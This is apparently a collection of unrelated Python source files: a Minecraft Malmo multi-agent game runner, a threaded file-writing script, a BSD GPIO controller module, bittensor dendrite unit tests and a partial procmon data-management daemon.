self._jason_env = pyson.runtime.Environment()
def register(self, agent_file):
"""Register an Agent to the game.
Args:
agent_file (str): Path to the .asl file (Jason text file).
"""
with open(agent_file) as source:
agent = self._jason_env.build_agent(source, actions)
agent.__class__ = Agent
agent.malmo_agent = MalmoPython.AgentHost()
self._agents.append(agent)
def _get_mission_xml(self):
return '''<?xml version="1.0" encoding="UTF-8" ?>
<Mission xmlns="http://ProjectMalmo.microsoft.com" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<About>
<Summary>''' + self.name + '''</Summary>
</About>
<ModSettings>
<MsPerTick>50</MsPerTick>
</ModSettings>
<ServerSection>
<ServerInitialConditions>
<AllowSpawning>false</AllowSpawning>
</ServerInitialConditions>
<ServerHandlers>
<FlatWorldGenerator generatorString="''' + self.world + '''" />
<ServerQuitWhenAnyAgentFinishes />
</ServerHandlers>
</ServerSection>
''' + self._get_agents_xml() + '''
</Mission>'''
def _get_agents_xml(self):
xml = ''
for agent in self._agents:
xml += '''<AgentSection mode="Survival">
<Name>''' + str(agent.name) + '''</Name>
<AgentStart>
<Placement x="''' + str(random.randint(0, 10)) + '''" y="229" z="''' + str(random.randint(0, 10)) + '''"/>
</AgentStart>
<AgentHandlers>
<ContinuousMovementCommands turnSpeedDegs="360">
<ModifierList type="deny-list"> <!-- Example deny-list: prevent agent from strafing -->
<command>strafe</command>
</ModifierList>
</ContinuousMovementCommands>
<ObservationFromNearbyEntities>
<Range name="entities" xrange="40" yrange="2" zrange="40"/>
</ObservationFromNearbyEntities>
<ObservationFromRay/>
<ObservationFromFullStats/>
<ObservationFromGrid>
<Grid name="floor3x3">
<min x="-1" y="-1" z="-1"/>
<max x="1" y="-1" z="1"/>
</Grid>
</ObservationFromGrid>
</AgentHandlers>
</AgentSection>'''
return xml
def run(self):
"""Runs the game with the registered agents
Raises:
:class:`jason_malmo.exceptions.NoAgentsException`: There are not registered agents in the game.\n
Register an agent before running the game::
game.register('/path/to/file.asl')
game.run()
"""
self._client_pool = MalmoPython.ClientPool()
if not len(self._agents):
raise NoAgentsException
for port in range(10000, 10000 + len(self._agents) + 1):
self._client_pool.add(MalmoPython.ClientInfo('127.0.0.1', port))
self._my_mission = MalmoPython.MissionSpec(self._get_mission_xml(), True)
for (index, agent) in enumerate(self._agents):
malmoutils.parse_command_line(agent.malmo_agent)
self._safe_start_mission(
agent.malmo_agent,
self._my_mission,
self._client_pool,
malmoutils.get_default_recording_object(agent.malmo_agent, "saved_data"),
index,
''
)
self._safe_wait_for_start([agent.malmo_agent for agent in self._agents])
threads = []
for agent in self._agents:
thr = threading.Thread(target=self._jason_env.run_agent, args=(agent,), kwargs={})
thr.start()
threads.append(thr)
# TODO while mission is running
while True:
for agent in self._agents:
for (belief, value) in agent.beliefs.items():
if belief[0] == 'tasks':
tasks = []
for task in list(value)[0].args[0]:
tasks.append(task)
self.tasks.handle(agent, tasks)
time.sleep(0.05)
@staticmethod
def _safe_start_mission(agent_host, mission, client_pool, recording, role, experiment_id):
used_attempts = 0
max_attempts = 5
print("Calling startMission for role", role)
while True:
try:
agent_host.startMission(mission, client_pool, recording, role, experiment_id)
break
except MalmoPython.MissionException as e:
error_code = e.details.errorCode
if error_code == MalmoPython.MissionErrorCode.MISSION_SERVER_WARMING_UP:
print("Server not quite ready yet - waiting...")
time.sleep(2)
elif error_code == MalmoPython.MissionErrorCode.MISSION_INSUFFICIENT_CLIENTS_AVAILABLE:
print("Not enough available Minecraft instances running.")
used_attempts += 1
if used_attempts < max_attempts:
print("Will wait in case they are starting up.", max_attempts - used_attempts, "attempts left.")
time.sleep(2)
elif error_code == MalmoPython.MissionErrorCode.MISSION_SERVER_NOT_FOUND:
print("Server not found - has the mission with role 0 been started yet?")
used_attempts += 1
if used_attempts < max_attempts:
print("Will wait and retry.", max_attempts - used_attempts, "attempts left.")
time.sleep(2)
else:
print("Other error:", e.message)
print("Waiting will not help here - bailing immediately.")
exit(1)
if used_attempts == max_attempts:
print("All chances used up - bailing now.")
exit(1)
print("startMission called okay.")
@staticmethod
def _safe_wait_for_start(agent_hosts):
print("Waiting for the mission to start", end=' ')
start_flags = [False for _ in agent_hosts]
start_time = time.time()
time_out = 120 # Allow two minutes for mission to start.
while not all(start_flags) and time.time() - start_time < time_out:
states = [a.peekWorldState() for a in agent_hosts]
start_flags = [w.has_mission_begun for w in states]
errors = [e for w in states for e in w.errors]
if len(errors) > 0:
print("Errors waiting for mission start:")
for e in errors:
print(e.text)
print("Bailing now.")
exit(1)
time.sleep(0.1)
print(".", end=' ')
print()
if time.time() - start_time >= time_out:
print("Timed out waiting for mission to begin. Bailing.")
exit(1)
print("Mission has started.")
|
123.py
|
import threading
import os
from random import random
from pathlib import Path
def threadingz():
    # Continuously rewrite the sensor files; 'with' closes each file every pass.
    while True:
        with open("temp.txt", "w+") as tempz, \
             open("fuel.txt", "w+") as fuel, \
             open("speed.txt", "w+") as speed:
            tempz.write("13")
            fuel.write("152")
            speed.write("200")
        print("write done")
# A Thread object is not callable, so it cannot be used as another thread's
# target; every worker has to target the function itself.
targ = threading.Thread(target=threadingz)
targ2 = threading.Thread(target=threadingz)
targ3 = threading.Thread(target=threadingz)
targ4 = threading.Thread(target=threadingz)
targ.start()
targ2.start()
targ3.start()
targ4.start()
|
unix.py
|
#!/usr/bin/env python3
"""Module for BSD-specific features, which are not available on other operating
systems."""
__author__ = 'Philipp Engel'
__copyright__ = 'Copyright (c) 2019, Hochschule Neubrandenburg'
__license__ = 'BSD-2-Clause'
import queue
import shlex
import subprocess
import time
import threading
from enum import Enum
from typing import Any, Dict, Tuple, Union
from core.manager import Manager
from core.system import System
from core.prototype import Prototype
class Unix(Enum):
"""
Type of BSD Unix derivate, either None, FreeBSD, NetBSD, or OpenBSD.
"""
NONE = 0
FREEBSD = 1
NETBSD = 2
OPENBSD = 3
class GpioController(Prototype):
"""
GpioController sets single pins of the General Purpose Input Output
(GPIO) interface of a Raspberry Pi single-board computer running FreeBSD,
NetBSD, or OpenBSD. This module does not work on Linux.
The JSON-based configuration for this module:
Parameters:
defaultState (int): Default state of pin (either 0 or 1).
duration (float): Time span to change the state of the pin (in seconds).
pin (str): Name of the GPIO pin.
"""
def __init__(self, module_name: str, module_type: str, manager: Manager):
super().__init__(module_name, module_type, manager)
config = self.get_module_config(self._name)
self._default_state = config.get('defaultState')
self._duration = config.get('duration')
self._pin = config.get('pin')
self._os = {
'FreeBSD': Unix.FREEBSD,
'NetBSD': Unix.NETBSD,
'OpenBSD': Unix.OPENBSD
}.get(System.get_os_name(), Unix.NONE)
if self._os == Unix.NONE:
raise ValueError('Operating system is not supported')
self._queue = queue.Queue(-1)
self._thread = None
self.add_handler('gpio', self.handle_gpio)
manager.schema.add_schema('gpio', 'gpio.json')
def _communicate(self, cmd: str) -> Tuple[str, str]:
"""Communicates with the operating system using `subprocess`.
Args:
cmd: The command to execute.
Returns:
The stdout and stderr of the process.
"""
args = shlex.split(cmd)
process = subprocess.Popen(args,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = process.communicate()
return stdout.decode('utf-8'), stderr.decode('utf-8')
def _get_command(self, os: Unix) -> Union[str, None]:
"""Returns derivate-specific command to set a single pin of the GPIO
interface.
Args:
os: The BSD unix derivate.
Returns:
Command to access the GPIO interface on BSD.
"""
cmd = {
Unix.FREEBSD: 'gpioctl -f /dev/gpioc0 {} {}',
Unix.NETBSD: 'gpioctl gpio0 {} {}',
Unix.OPENBSD: 'gpioctl gpio0 {} {}'
}.get(os, None)
return cmd
def _set_pin(self, pin: str, value: int) -> None:
"""Sets given pin to value.
Args:
pin: The pin name or number.
value: The value to set the pin to (e.g., 0 or 1).
"""
cmd = self._get_command(self._os).format(pin, value)
out, err = self._communicate(cmd)
if err and len(err) > 0:
self.logger.error(f'Setting GPIO pin "{pin}" to "{value}" failed: '
f'{err}')
else:
self.logger.verbose(f'Set GPIO pin "{pin}" to "{value}"')
def handle_gpio(self,
header: Dict[str, Any],
payload: Dict[str, Any]) -> None:
"""Puts message payload in the queue.
Args:
header: The message header.
payload: The message payload.
"""
self._queue.put(payload)
def run(self) -> None:
"""Waits for new messages and sets GPIO pin to high or low."""
while self.is_running:
# Blocking I/O.
message = self._queue.get()
value = message.get('value', self._default_state)
if value in [0, 1, "0", "1"]:
self._set_pin(self._pin, value)
time.sleep(self._duration)
self._set_pin(self._pin, self._default_state)
def start(self) -> None:
if self._is_running:
return
super().start()
self._thread = threading.Thread(target=self.run)
self._thread.daemon = True
self._thread.start()
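# Example module configuration (a sketch; the key names follow the class
# docstring above, while the module name and pin are assumptions):
#
#   "gpioController": {
#       "defaultState": 0,
#       "duration": 2.0,
#       "pin": "pin17"
#   }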
|
test_forward_backward.py
|
from sys import version
from bittensor._endpoint import endpoint
import bittensor
import torch
import pytest
from unittest.mock import MagicMock
from torch.autograd import Variable
import multiprocessing
import time
dendrite = bittensor.dendrite()
dendrite.receptor_pool.forward = MagicMock(return_value = [torch.tensor([]), [1], [0]])
dendrite.receptor_pool.backward = MagicMock(return_value = [torch.tensor([]), [1], [0]])
endpoint = bittensor.endpoint(
version = bittensor.__version_as_int__,
uid = 0,
hotkey = '',
ip = '0.0.0.0',
ip_type = 4,
port = 8080,
modality = 0,
coldkey = ''
)
def test_dendrite_forward_tensor_shape_error():
x = torch.rand(3, 3, 3)
with pytest.raises(ValueError):
dendrite.forward_tensor( endpoints=[endpoint], inputs=[x])
def test_dendrite_forward_image_shape_error():
x = torch.rand(3, 3, 3)
with pytest.raises(ValueError):
dendrite.forward_image( endpoints=[endpoint], inputs=[x])
def test_dendrite_forward_text_shape_error():
x = torch.rand(3, 3, 3)
with pytest.raises(ValueError):
dendrite.forward_image( endpoints=[endpoint], inputs=[x])
def test_dendrite_forward_text():
x = torch.tensor([[1,2,3,4],[5,6,7,8]], dtype=torch.long)
dendrite.receptor_pool.forward = MagicMock(return_value = [ [torch.zeros([2, 4, bittensor.__network_dim__])], [1], [0]])
tensors, codes, times = dendrite.forward_text( endpoints=[endpoint], inputs=[x])
assert codes[0].item() == bittensor.proto.ReturnCode.Success
assert list(tensors[0].shape) == [2, 4, bittensor.__network_dim__]
def test_dendrite_forward_image():
x = torch.tensor([ [ [ [ [ 1 ] ] ] ] ], dtype=torch.float32)
dendrite.receptor_pool.forward = MagicMock(return_value = [ [torch.zeros([1, 1, bittensor.__network_dim__])] , [1], [0]])
tensors, codes, times = dendrite.forward_image( endpoints=[endpoint], inputs=[x])
assert codes[0].item() == bittensor.proto.ReturnCode.Success
assert list(tensors[0].shape) == [1, 1, bittensor.__network_dim__]
def test_dendrite_forward_tensor():
x = torch.rand(3, 3, bittensor.__network_dim__, dtype=torch.float32)
dendrite.receptor_pool.forward = MagicMock(return_value = [ [torch.zeros([3, 3, bittensor.__network_dim__])], [1], [0]])
tensors, codes, times = dendrite.forward_tensor( endpoints=[endpoint], inputs=[x])
assert codes[0].item() == bittensor.proto.ReturnCode.Success
assert list(tensors[0].shape) == [3, 3, bittensor.__network_dim__]
def test_dendrite_forward_tensor_pass_through_text():
x = torch.ones((3, 3), dtype=torch.int64)
y = torch.zeros([3, 3, bittensor.__network_dim__])
dendrite.receptor_pool.forward = MagicMock(return_value = [ [y, y, y] , [1, 1, 1], [0,0,0]])
tensors, codes, times = dendrite.forward_text( endpoints=[endpoint, endpoint, endpoint], inputs=[x, x, x])
assert codes[0].item() == bittensor.proto.ReturnCode.Success
assert codes[1].item() == bittensor.proto.ReturnCode.Success
assert codes[2].item() == bittensor.proto.ReturnCode.Success
assert tensors[0].shape == y.shape
assert tensors[1].shape == y.shape
assert tensors[2].shape == y.shape
def test_dendrite_forward_tensor_pass_through_image():
x = torch.rand(3, 3, 3, 3, 3)
y = torch.zeros([3, 3, bittensor.__network_dim__])
dendrite.receptor_pool.forward = MagicMock(return_value = [ [y, y, y] , [1, 1, 1], [0,0,0]])
tensors, codes, times = dendrite.forward_image( endpoints=[endpoint, endpoint, endpoint], inputs=[x, x, x])
assert codes[0].item() == bittensor.proto.ReturnCode.Success
assert codes[1].item() == bittensor.proto.ReturnCode.Success
assert codes[2].item() == bittensor.proto.ReturnCode.Success
assert tensors[0].shape == y.shape
assert tensors[1].shape == y.shape
assert tensors[2].shape == y.shape
def test_dendrite_forward_tensor_pass_through_tensor():
x = torch.rand(3, 3, bittensor.__network_dim__)
y = torch.zeros([3, 3, bittensor.__network_dim__])
dendrite.receptor_pool.forward = MagicMock(return_value = [ [y, y, y] , [1, 1, 1], [0,0,0]])
tensors, codes, times = dendrite.forward_tensor( endpoints = [endpoint, endpoint, endpoint], inputs=[x, x, x])
assert codes[0].item() == bittensor.proto.ReturnCode.Success
assert codes[1].item() == bittensor.proto.ReturnCode.Success
assert codes[2].item() == bittensor.proto.ReturnCode.Success
assert tensors[0].shape == y.shape
assert tensors[1].shape == y.shape
assert tensors[2].shape == y.shape
def test_dendrite_forward_tensor_stack():
x = torch.rand(3, 3, bittensor.__network_dim__)
y = torch.zeros([3, 3, bittensor.__network_dim__])
dendrite.receptor_pool.forward = MagicMock(return_value = [ [y, y, y] , [1, 1, 1], [0,0,0]])
tensors, codes, times = dendrite.forward_tensor( endpoints = [endpoint, endpoint, endpoint], inputs = [x, x, x])
stacked = torch.stack(tensors, dim=2)
assert stacked.shape == torch.zeros([3, 3, 3, bittensor.__network_dim__ ]).shape
averaged = torch.mean(stacked, dim=2)
assert averaged.shape == torch.zeros([3, 3, bittensor.__network_dim__ ]).shape
def test_dendrite_backward():
x = Variable(torch.rand((1, 1, bittensor.__network_dim__), dtype=torch.float32), requires_grad=True)
y = torch.ones((1, 1, bittensor.__network_dim__))
dendrite.receptor_pool.forward = MagicMock(return_value = [ [y], [0], [0]])
dendrite.receptor_pool.backward = MagicMock(return_value = [ [y], [0], [0]])
tensors, codes, times = dendrite.forward_tensor( endpoints = [ endpoint ], inputs=[ x ])
tensors[0].sum().backward()
assert x.grad.shape == y.shape
def test_dendrite_backward_large():
x = Variable(torch.rand((1, 1, bittensor.__network_dim__), dtype=torch.float32), requires_grad=True)
y = torch.ones((1, 1, bittensor.__network_dim__))
dendrite.receptor_pool.forward = MagicMock(return_value = [ [y], [0], [0]])
dendrite.receptor_pool.backward = MagicMock(return_value = [ [y], [0], [0]])
tensors, codes, times = dendrite.forward_tensor( endpoints = [ endpoint ], inputs=[ x ])
tensors[0].sum().backward()
assert x.grad.shape == y.shape
assert x.grad.tolist() == y.tolist()
def test_dendrite_backward_multiple():
x1 = Variable(torch.rand((1, 1, bittensor.__network_dim__), dtype=torch.float32), requires_grad=True)
x2 = Variable(torch.rand((1, 1, bittensor.__network_dim__), dtype=torch.float32), requires_grad=True)
x3 = Variable(torch.rand((1, 1, bittensor.__network_dim__), dtype=torch.float32), requires_grad=True)
y1 = torch.ones(1, 1, bittensor.__network_dim__)
y2 = torch.ones(1, 1, bittensor.__network_dim__)
y3 = torch.ones(1, 1, bittensor.__network_dim__)
dendrite.receptor_pool.forward = MagicMock(return_value = [ [y1, y2, y3], [1,1,1], [0,0,0]])
dendrite.receptor_pool.backward = MagicMock(return_value = [ [y1, y2, y3], [1,1,1], [0,0,0]])
tensors, codes, times = dendrite.forward_tensor( endpoints = [endpoint, endpoint, endpoint], inputs=[ x1, x2, x3 ])
tensors[0].sum().backward()
assert x1.grad.shape == y1.shape
assert x2.grad.shape == y2.shape
assert x3.grad.shape == y3.shape
assert x1.grad.tolist() == y1.tolist()
assert x2.grad.tolist() == y2.tolist()
assert x3.grad.tolist() == y3.tolist()
# def test_multiprocessing_forward():
# dendrite = bittensor.dendrite()
# dendrite.receptor_pool.forward = MagicMock(return_value = [torch.tensor([]), [0]])
# dendrite.receptor_pool.backward = MagicMock(return_value = [torch.tensor([]), [0]])
# endpoint = bittensor.endpoint(
# uid = 0,
# hotkey = '',
# ip = '0.0.0.0',
# ip_type = 4,
# port = 8080,
# modality = 0,
# coldkey = ''
# )
# def call_forwad_multiple_times( object ):
# for _ in range(5):
# x = torch.rand(3, 3, bittensor.__network_dim__)
# y = torch.zeros([3, 3, bittensor.__network_dim__])
# dendrite.receptor_pool.forward = MagicMock(return_value = [ [y, y, y] , [0, 0, 0]])
# tensors, codes, times = dendrite.forward_tensor( endpoints = [ endpoint, endpoint, endpoint], inputs = [x, x, x] )
# p1 = multiprocessing.Process(target=call_forwad_multiple_times, args=(dendrite,))
# p2 = multiprocessing.Process(target=call_forwad_multiple_times, args=(dendrite,))
# p1.start()
# p2.start()
# p1.join()
# p2.join()
if __name__ == "__main__":
test_dendrite_backward_multiple()
#test_dendrite_backward_large()
|
procmonManager.py
|
################################################################################
# procmon, Copyright (c) 2014, The Regents of the University of California,
# through Lawrence Berkeley National Laboratory (subject to receipt of any
# required approvals from the U.S. Dept. of Energy). All rights reserved.
#
# If you have questions about your rights to use or distribute this software,
# please contact Berkeley Lab's Technology Transfer Department at TTD@lbl.gov.
#
# The LICENSE file in the root directory of the source code archive describes
# the licensing and distribution rights and restrictions on this software.
#
# Author: Douglas Jacobsen <dmj@nersc.gov>
################################################################################
#!/usr/bin/env python
import os
import sys
import subprocess
from datetime import datetime, timedelta
import time
import socket
import threading
import json
import traceback
import errno
import re
import shutil
import argparse
from ConfigParser import SafeConfigParser
import syslog
procmonInstallBase = ''
if 'PROCMON_DIR' in os.environ:
procmonInstallBase = os.environ['PROCMON_DIR']
def split_args(arg_str, splitRegex):
items = re.split(splitRegex, arg_str)
ret_items = []
for item in items:
item = item.strip()
if len(item) > 0:
ret_items.append(item)
return ret_items
def split_path(arg_str):
return split_args(arg_str, '[:\n]')
def is_True(arg_str):
return arg_str == "True"
def split_comma(arg_str):
return split_args(arg_str, '[,\s\n]')
def send_email(config, subject, message):
if not config.use_email:
return
import smtplib
message = """From: %s
To: %s
Subject: MESSAGE FROM PROCMON: %s
%s
""" % (config.email_originator, ", ".join(config.email_list), subject, message)
try:
smtp_message = smtplib.SMTP('localhost')
smtp_message.sendmail(config.email_originator, config.email_list, message)
except smtplib.SMTPException:
        syslog.syslog(syslog.LOG_ERR, "Error: failed to send email!")
def get_exception():
exc_type, exc_value, exc_traceback = sys.exc_info()
str_exc = traceback.format_exc()
str_tb = '\n'.join(traceback.format_tb(exc_traceback))
str_stack2 = '' #'\n'.join(traceback.format_stack())
s = '%s\n%s\n%s\n' % (str_exc, str_tb, str_stack2)
    s = filter(lambda x: x != '\x00', s)
return s.decode('unicode_escape').encode('ascii','ignore')
def start_procMuxer(config, group=None, id=None, prefix=None, pidfile=None):
args = [config.procMuxerPath, '-c', '60', '-d']
if prefix is not None:
args.extend(['-O',prefix])
if group is not None:
args.extend(['-g',group])
if id is not None:
args.extend(['-i',str(id)])
if pidfile is not None:
args.extend(['-p',pidfile])
syslog.syslog("starting proxmuxer with args: %s" % ' '.join(args))
return subprocess.call(args, stdin=None, stdout=None, stderr=None)
def get_muxer_pid(config, muxer_id):
pidfilename = "%s/%s/%d" % (config.base_pid_path, config.group, muxer_id)
current_pid = None
if os.path.exists(pidfilename):
try:
fd = open(pidfilename, 'r')
for line in fd:
current_pid = int(line.strip())
except:
pass
return current_pid
def is_muxer_running(config, muxer_id):
current_pid = get_muxer_pid(config, muxer_id)
if type(current_pid) is int:
procfile = "/proc/%d/status" % current_pid
return os.path.exists(procfile)
return False
def get_current_files(config, muxer_id):
current_pid = get_muxer_pid(config, muxer_id)
files = []
if type(current_pid) is int:
for fdnum in xrange(3,10):
fdpath = "/proc/%d/fd/%d" % (current_pid, fdnum)
if os.path.exists(fdpath):
filename = os.readlink(fdpath)
if re.search('%s.*procMuxer\.%d' % (config.group, muxer_id), filename):
files.append(filename)
else:
break
return files
def mkdir_p(path):
try:
os.makedirs(path, 0755)
except OSError as e:
if e.errno == errno.EEXIST and os.path.isdir(path): pass
else: raise
def archive_hpss(config, fname, ftype, sources = None, doNothing=False):
(somepath,core_fname) = os.path.split(fname)
with config.hpss_lock:
newpath = "%s/%s/archiving/%s" % (config.base_prefix, config.group, core_fname)
try:
shutil.copy2(fname, newpath);
os.chmod(newpath, 0444)
except:
except_string = get_exception()
            syslog.syslog(syslog.LOG_ERR, "failed to copy file to archival dir: %s; %s; %s" % (fname, newpath, except_string))
            send_email(config, "failed to copy file to archival dir", "%s\n%s\n%s\n" % (fname, newpath, except_string))
return 1
prodfileRegex = re.compile('%s\.(\d+)\.h5' % config.h5_prefix)
for a_fname in os.listdir("%s/%s/archiving" % (config.base_prefix, config.group)):
match = prodfileRegex.match(a_fname)
hpssPath = "%s/other" % config.h5_prefix
if match is not None:
file_dt = datetime.strptime(match.group(1), "%Y%m%d%H%M%S")
hpssPath = "%s/%04d/%02d" % (config.h5_prefix, int(file_dt.year), int(file_dt.month))
cmd=["hsi","put -P -d %s/%s/archiving/%s : %s/%s" % (config.base_prefix, config.group, a_fname, hpssPath, a_fname)]
retval = subprocess.call(cmd)
if retval == 0:
syslog.syslog(syslog.LOG_INFO, "successfully archived %s to %s/%s" % (a_fname, hpssPath, a_fname))
else:
syslog.syslog(syslog.LOG_ERR, "failed to archive %s, %d" % (a_fname, retval))
send_email(config, "failed to archive", "%s, %d" % (a_fname, retval))
def register_jamo(config, fname, ftype, sources = None, doNothing=False):
md_final = None
tape_archival = [1]
local_purge_days = 180
if ftype == "procmon_badrecords_h5":
tape_archival = []
local_purge_days = 7
if ftype == "procmon_stripe_h5":
tape_archival = []
local_purge_days = 7
if ftype == "procmon_reduced_h5":
tape_archival = [1]
local_purge_days = 180
if ftype == 'procmon_summary_h5':
tape_archival = [1]
local_purge_days = 180
retval = subprocess.call(['/bin/setfacl', '-m', 'user:%s:rw-' % config.jamo_user, fname])
if retval != 0:
syslog.syslog(syslog.LOG_ERR, "failed to set acl on %s" % fname)
send_email(config, "failed to set acl", fname)
return None
md_proc = subprocess.Popen([config.metadata_path, '-i', fname], stdout=subprocess.PIPE)
(stdout, stderr) = md_proc.communicate()
if md_proc.returncode == 0:
metadata = json.loads(stdout)
if 'recording_start' in metadata:
tmp_dt = datetime.fromtimestamp(int(metadata['recording_start']))
metadata['recording_start'] = tmp_dt.strftime("%Y-%m-%dT%H:%M:%S.%f")
if 'recording_stop' in metadata:
tmp_dt = datetime.fromtimestamp(int(metadata['recording_stop']))
metadata['recording_stop'] = tmp_dt.strftime("%Y-%m-%dT%H:%M:%S.%f")
del metadata['hosts']
if sources is not None:
metadata['source'] = {'metadata_id': sources}
md_final = {}
md_final['procmon'] = metadata
else:
syslog.syslog(syslog.LOG_ERR, "failed to read file stats: %s" % fname)
send_email(config, "failed to read file stats", fname)
return None
posted = None
if sources is None:
sources = []
if doNothing:
return None
with config.sdm_lock:
posted = config.sdm.post('api/metadata/file',
file=fname,
file_type=ftype,
local_purge_days=local_purge_days,
backup_services=tape_archival,
inputs=sources,
metadata=md_final,
)
if posted is None or 'metadata_id' not in posted:
syslog.syslog(syslog.LOG_ERR, "failed to register with jamo: %s; %s" % (fname, ftype, ))
send_email(config, "failed to register with jamo", "%s\n%s\n" % (fname, ftype, ))
return posted
def reduce_files_wrapper(config, timeobj, filenames):
try:
reduce_files(config, timeobj, filenames)
except:
except_string = get_exception()
syslog.syslog(syslog.LOG_ERR, "reducer thread failure: %s" % except_string)
send_email(config, "reducer thread failure: %s" % except_string)
def reduce_files(config, timeobj, filenames):
"""Runs the reducer on the files. Then moves files to final destination,
sets proper permissions, then registers the files with JAMO"""
product_output = "%s/%s/processing/%s.%s.h5" % (config.base_prefix, config.group, config.h5_prefix, timeobj.strftime("%Y%m%d%H%M%S"))
bad_output = "%s/%s/processing/bad_%s.%s.h5" % (config.base_prefix, config.group, config.h5_prefix, timeobj.strftime("%Y%m%d%H%M%S"))
reducer_args = [config.reducer_path, '-o', product_output, '-b', bad_output]
for f in filenames:
reducer_args.extend(['-i', f])
retval = subprocess.call(reducer_args, stdin=None, stdout=None, stderr=None)
if retval != 0:
syslog.syslog(syslog.LOG_ERR, "reducer failed! retcode: %d; cmd: %s" % (retval, " ".join(reducer_args)))
send_email(config, "reducer failed!", "retcode: %d\ncmd: %s" % (retval, " ".join(reducer_args)))
return 1
(currpath, product_fname) = os.path.split(product_output)
(currpath, bad_fname) = os.path.split(bad_output)
final_product = '%s/%s' % (config.h5_path, product_fname)
final_badoutput = '%s/%s' % (config.target_scratch, bad_fname)
sources = []
for f in filenames:
(somepath,fname) = os.path.split(f)
newpath = "%s/%s" % (config.target_scratch, fname)
try:
syslog.syslog(syslog.LOG_ERR, "about to move %s to %s " % (f, newpath))
shutil.move(f, newpath);
syslog.syslog(syslog.LOG_ERR, "about to chmod %s " % (newpath))
os.chmod(newpath, 0444)
except:
except_string = get_exception()
syslog.syslog(syslog.LOG_ERR, "reducer failed to move file: %s; %s; %s\n" % (f, newpath, except_string))
send_email(config, "reducer failed to move file", "%s\n%s\n%s\n" % (f, newpath, except_string))
return 1
if config.use_jamo:
response = register_jamo(config, newpath, "procmon_stripe_h5")
if 'metadata_id' in response:
sources.append(response['metadata_id'])
if config.use_hpss:
archive_hpss(config, product_output, "procmon_reduced_h5", sources)
try:
shutil.move(product_output, final_product)
os.chmod(final_product, 0444)
except:
except_string = get_exception()
syslog.syslog(syslog.LOG_ERR, "reducer failed to move file: %s; %s; %s\n" % (f, newpath, except_string))
send_email(config, "reducer failed to move file", "%s\n%s\n%s\n" % (product_output, final_product, except_string))
return 1
if config.use_jamo:
register_jamo(config, final_product, "procmon_reduced_h5", sources)
try:
shutil.move(bad_output, final_badoutput)
os.chmod(final_badoutput, 0444)
except:
except_string = get_exception()
syslog.syslog(syslog.LOG_ERR, "reducer failed to move file: %s; %s; %s\n" % (f, newpath, except_string))
send_email(config, "reducer failed to move file", "%s\n%s\n%s" % (bad_output, final_badoutput, except_string))
return 1
if config.use_jamo:
register_jamo(config, final_badoutput, "procmon_badrecords_h5", sources)
def main_loop(config):
# create pid directory
syslog.syslog(syslog.LOG_INFO, "procmonManager: attempting to create directory %s/%s" % (config.base_pid_path, config.group))
mkdir_p("%s/%s" % (config.base_pid_path, config.group))
# create working directory
mkdir_p("%s/%s" % (config.base_prefix, config.group))
mkdir_p("%s/%s/processing" % (config.base_prefix, config.group))
mkdir_p("%s/%s/collecting" % (config.base_prefix, config.group))
mkdir_p("%s/%s/archiving" % (config.base_prefix, config.group))
os.chdir("%s/%s" % (config.base_prefix, config.group))
file_prefix = "%s/%s/collecting/procMuxer" % (config.base_prefix, config.group)
last_rotation = None
syslog.syslog(syslog.LOG_WARNING, "starting management of %s ProcMuxer group on %s" % (config.group, socket.gethostname()))
send_email(config, "%s starting" % config.group, "starting management of %s ProcMuxer group on %s" % (config.group, socket.gethostname()))
## enter into perpetual loop
reduce_threads = {}
while True:
## check if the muxers are running, if not, restart them
for muxer_id in xrange(config.num_procmuxers):
if not is_muxer_running(config, muxer_id):
start_procMuxer(config, group=config.group, id=muxer_id,
prefix="%s.%d" % (file_prefix, muxer_id),
pidfile="%s/%s/%d" % (config.base_pid_path, config.group, muxer_id)
)
## if more than an hour has elapsed since the last successful
## rotation of log files, then check
if (not last_rotation) or ((datetime.now() - last_rotation).total_seconds() > 3600):
## get list of currently open files
open_filenames = []
for muxer_id in xrange(config.num_procmuxers):
files = get_current_files(config, muxer_id)
for f in files:
(path,fname) = os.path.split(f)
if fname: open_filenames.append(fname)
## get list of files in collecting, filter out current files and non-targets
## put into candidate_files
files = os.listdir('%s/%s/collecting' % (config.base_prefix, config.group))
open_files = []
candidate_files = []
for f in files:
fmatch = re.match('procMuxer\.(\d+)\.(\d+).h5', f)
if not fmatch: continue
muxer = fmatch.group(1)
file_dt = datetime.strptime(fmatch.group(2), "%Y%m%d%H%M%S")
file_dt = datetime(file_dt.year, file_dt.month, file_dt.day, file_dt.hour)
if f not in open_filenames:
candidate_files.append( (f,file_dt,) )
else:
open_files.append( (f, file_dt,) )
# put any files from candidate list which have same hour as a file in open list
# into the final_candidate_files hash
premature_files = []
final_candidate_files = {}
for (cf,cf_dt) in candidate_files:
matched = False
for (of, of_dt) in open_files:
if of_dt == cf_dt: matched = True
if not matched:
if cf_dt not in final_candidate_files:
final_candidate_files[cf_dt] = []
final_candidate_files[cf_dt].append(cf)
else:
premature_files.append( (cf, cf_dt,) )
# get list of file times in order
times = sorted(final_candidate_files.keys())
for fc_time in times:
## move the files
processing_files = []
for fname in final_candidate_files[fc_time]:
old_filename = "%s/%s/collecting/%s" % (config.base_prefix, config.group, fname)
new_filename = "%s/%s/processing/%s" % (config.base_prefix, config.group, fname)
os.rename(old_filename, new_filename)
processing_files.append(new_filename)
## create a thread to manage the reduction of the files
reduce_thread = threading.Thread(target=reduce_files_wrapper, args=(config, fc_time, processing_files,))
reduce_thread.start()
#reduce_threads[fc_time] = reduce_thread
last_rotation = fc_time
time.sleep(20)
def read_configuration(args):
global procmonInstallBase
parser = argparse.ArgumentParser(add_help=False)
parser.add_argument('-f', '--config', help="Specify configuration file instead of default at $PROCMON_DIR/etc/procmonManager.conf", default='%s/etc/procmonManager.conf' % procmonInstallBase, metavar="FILE")
args, remaining_args = parser.parse_known_args()
defaults = {
"group": "procman_prod",
"num_procmuxers": 2,
"procMuxerPath": "%s/sbin/ProcMuxer" % procmonInstallBase,
"reducer_path": "%s/sbin/PostReducer" % procmonInstallBase,
"metadata_path": "%s/sbin/CheckH5" % procmonInstallBase,
"base_pid_path": "/tmp/pid",
"base_prefix": "/tmp",
"h5_path": "%s/var/procmon" % procmonInstallBase,
"h5_prefix": "procmon",
"daemonize": False,
"target_scratch": None,
"email_list": None,
"email_originator": None,
"use_email": False,
"use_jamo": False,
"use_hpss": False,
"jamo_url": None,
"jamo_token": None,
"jamo_user": None,
"logfacility": "local4",
}
if args.config and os.path.exists(args.config):
config = SafeConfigParser()
config.read([args.config])
